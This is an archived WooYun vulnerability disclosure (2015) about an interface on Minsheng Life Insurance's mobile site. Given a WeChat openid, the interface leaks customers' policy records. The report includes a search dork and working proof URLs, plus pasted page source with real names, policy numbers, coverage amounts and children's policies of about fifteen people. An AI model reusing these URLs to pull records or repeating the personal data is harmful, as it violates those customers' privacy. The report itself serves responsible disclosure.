民生人寿保险股份有限公司某处接口不严导致少量用户个人信息泄漏（保单号，姓名，保险期限）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132610

漏洞标题：民生人寿保险股份有限公司某处接口不严导致少量用户个人信息泄漏（保单号，姓名，保险期限）

漏洞作者： 0x 80

提交时间：2015-08-08 19:19

修复时间：2015-09-25 14:30

公开时间：2015-09-25 14:30

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-08：细节已通知厂商并且等待厂商处理中
2015-08-11：厂商已经确认，细节仅向厂商公开
2015-08-21：细节向核心白帽子及相关领域专家公开
2015-08-31：细节向普通白帽子公开
2015-09-10：细节向实习白帽子公开
2015-09-25：细节向公众公开

简要描述：

民生人寿保险股份有限公司某处接口不严导致少量用户个人信息泄漏（保单号，姓名，保险期限）

详细说明：

利用方式:site:m.minshenglife.com/
http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuM_2nsC5UzmKxI5iF8eJpGI
这里直接带出了opqgIuM_2nsC5UzmKxI5iF8eJpGI

漏洞在源代码中
我们来看看

<div class="exchange_title_bottom">
      <span class="title_bottom_horn hore_left"></span><span class="title_bottom_font">您共有8个保单记录:</span>
    </div>
  </div>
  <!--保单详情出行福-->

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuHyhwZOxLWrQCsUgG0sJKuc

<li style="display:none;"><span class="detail_title_li">保单号：</span><span class="detail_title_list">86110020150212291968 </span></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">赵方方</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">赵方方</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">3个月</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
			
				
					公交+出租10.0万元
				
					飞机40.0万元
				
					地铁10.0万元
				
					自驾车8.0万元
				
			
			
	     
	     </span>
  </li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>
  
    
    
    
    
    
    
    <!-- 出行宝交通意外险保单列表 -->
    
    
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-04</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212301429</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">赵方方</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">赵方方</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-04</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212301430</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">杨建武</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">杨建武</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-04</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212301432</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">杨凤云</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">杨凤云</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-21</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212302836</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">周培</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">周培</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-21</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212302837</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">单瑞祥</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">单瑞祥</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-21</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212302838</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">焦旭光</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">焦旭光</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
	
	
    
    <!--保单详情护身福-->
       
     
    
  <div class="search_detail">
  <div class="search_detail_info">
  	<span class="search_choice_icon1" id="search_choice_icon"></span>
    <ul class="search_detail_title">
      <li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生乖宝宝少儿重大疾病保险</label></li>
		
				
     				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-03-04</font></li>
     			
     			
      	
      <li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020140212291971</label></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">杨明玉</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">杨鑫蕊</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">1年</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">4000元</span></li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>
      
  <div class="search_detail">
  <div class="search_detail_info">
  	<span class="search_choice_icon1" id="search_choice_icon"></span>
    <ul class="search_detail_title">
      <li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生乖宝宝少儿重大疾病保险</label></li>
		
				
     				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-21</font></li>
     			
     			
      	
      <li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212303845</label></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">杨建武</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">杨鑫蕊</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">1年</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">5000元</span></li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>
      
  <div class="search_detail">
  <div class="search_detail_info">
  	<span class="search_choice_icon1" id="search_choice_icon"></span>
    <ul class="search_detail_title">
      <li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生乖宝宝少儿重大疾病保险</label></li>
		
				
     				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-25</font></li>
     			
     			
      	
      <li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212305783</label></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">杨明玉</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">杨欣月</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">1年</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">5000元</span></li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuEcCgDlDvshXXoS20BR3ric

<li style="display:none;"><span class="detail_title_li">保单号：</span><span class="detail_title_list">86110020140212195027 </span></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">刁秋枚</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">刁秋枚</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">3个月</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
			
				
					公交+出租10.0万元
				
					地铁20.0万元
				
					火车20.0万元
				
					自驾车2.0万元
				
			
			
	     
	     </span>
  </li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>
  
    
    
    
    
    
    
    <!-- 出行宝交通意外险保单列表 -->
    
    
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-04-29</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212297803</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">刁秋枚</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">刁秋枚</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-04-29</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212297831</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">曾建军</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">曾建军</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-04-29</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212297834</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">刁火星</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">刁火星</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-04-29</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212297970</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">骆辉</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">骆辉</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-14</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212302038</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">吴泉光</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">吴泉光</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
			<div class="search_detail">
			<div class="search_detail_info">
			<span class="search_choice_icon1" id="search_choice_icon"></span>
			<ul class="search_detail_title">
				<li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生出行宝交通工具意外伤害保险</label></li>
 				
	 				
	      				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2015-05-14</font></li>
	      			
	      			
      			
<!--       			<li  style="display:none;"><span class="detail_title_li">保险名称：</span><span class="detail_title_list"> -->
<!--       					民生出行宝交通工具意外伤害保险 -->
<!--       			</span></li> -->
				<li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020150212301998</label></li>
				<li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">吴泉光</label></li>
				<li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">吴泉光</label></li>
				<li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">
					
      				
      					7天
      				
				</label></li>
				<li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">
						
							
								自驾车10.0万元
							
						
						
					
					</span>
				</li>
<!--			<li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
			</ul>
			<hr class="info_hr"/>
			</div>
			</div>
		
	
	
    
    <!--保单详情护身福-->
       
     
    
  <div class="search_detail">
  <div class="search_detail_info">
  	<span class="search_choice_icon1" id="search_choice_icon"></span>
    <ul class="search_detail_title">
      <li><span class="detail_title_li">保险名称：</span><label class="detail_title_font">民生乖宝宝少儿重大疾病保险</label></li>
		
				
     				<li  style="display:none;"><span class="detail_title_li">生效日期：</span><font class="search_detail_font">2014-07-02</font></li>
     			
     			
      	
      <li style="display:none;"><span class="detail_title_li">保单号：</span><label class="detail_title_font">86110020140212050170</label></li>
      <li style="display:none;"><span class="detail_title_li">投保人：</span><label class="detail_title_font">刁秋枚</label></li>
      <li style="display:none;"><span class="detail_title_li">被保人：</span><label class="detail_title_font">吴海彬</label></li>
      <li style="display:none;"><span class="detail_title_li">保险期间：</span><label class="detail_title_font">1年</label></li>
      <li style="display:none;"><span class="detail_title_li">保障：</span><span class="detail_title_list">25000元</span></li>
<!--      <li><span class="detail_title_li">保单状态：</span><font class="search_detail_font">未失效</font></li>-->
    </ul>
    <hr class="info_hr"/>
   </div>
   </div>

漏洞证明：

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuEcCgDlDvshXXoS20BR3ric

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuM_2nsC5UzmKxI5iF8eJpGI

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuElfTif1TmRh3-RBbd16Hyg

http://m.minshenglife.com/wm/wx/wxTripSearchBothContDetail.do?aaa=%22+111&openid=opqgIuKwfGRU4g3hBBcvZZPxPdyk

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-08-11 14:28

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向保险行业信息化主管部门通报，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132610

漏洞标题：民生人寿保险股份有限公司某处接口不严导致少量用户个人信息泄漏（保单号，姓名，保险期限）

相关厂商：民生人寿保险股份有限公司

漏洞作者： 0x 80

提交时间：2015-08-08 19:19

修复时间：2015-09-25 14:30

公开时间：2015-09-25 14:30

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132610

漏洞标题：民生人寿保险股份有限公司某处接口不严导致少量用户个人信息泄漏（保单号，姓名，保险期限）

相关厂商：民生人寿保险股份有限公司

漏洞作者： 0x 80

提交时间：2015-08-08 19:19

修复时间：2015-09-25 14:30

公开时间：2015-09-25 14:30

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0132610"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：